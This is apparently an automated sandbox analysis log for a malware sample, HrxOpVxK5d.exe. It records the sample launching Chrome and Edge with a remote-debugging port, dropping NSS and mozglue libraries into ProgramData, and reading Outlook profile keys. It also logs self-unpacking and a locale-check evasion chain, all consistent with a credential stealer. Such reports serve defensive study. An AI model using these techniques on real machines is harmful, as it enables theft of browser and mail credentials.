Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6980 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7132 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 2436
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5308 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2340,i,8805815916245064741,14049672499791549619,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2848 --field-trial-handle=2556,i,10855429805949803760,7672887330153088567,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6980 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7132 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5308 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: mozglue.pdbP source: HrxOpVxK5d.exe, 00000000.00000002.1798796176.000000006CEBD000.00000002.00000001.01000000.00000013.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: HrxOpVxK5d.exe, 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: my_library.pdbU source: HrxOpVxK5d.exe, 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799365474.000000006D8B1000.00000002.00000001.01000000.00000007.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
Source:	Binary string: my_library.pdb source: HrxOpVxK5d.exe, HrxOpVxK5d.exe, 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799365474.000000006D8B1000.00000002.00000001.01000000.00000007.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: HrxOpVxK5d.exe, 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: HrxOpVxK5d.exe, 00000000.00000002.1798796176.000000006CEBD000.00000002.00000001.01000000.00000013.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Unpacked PE file: 0.2.HrxOpVxK5d.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Unpacked PE file: 0.2.HrxOpVxK5d.exe.400000.1.unpack

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,

0_2_0040A090

Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0041B335 push ecx; ret		0_2_0041B348
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE7B536 push ecx; ret		0_2_6CE7B549

Source: HrxOpVxK5d.exe

Static PE information: section name: .text entropy: 7.792888233688181

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00419F20

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-83743

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Dropped PE file which has not been started: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

API coverage: 6.8 %

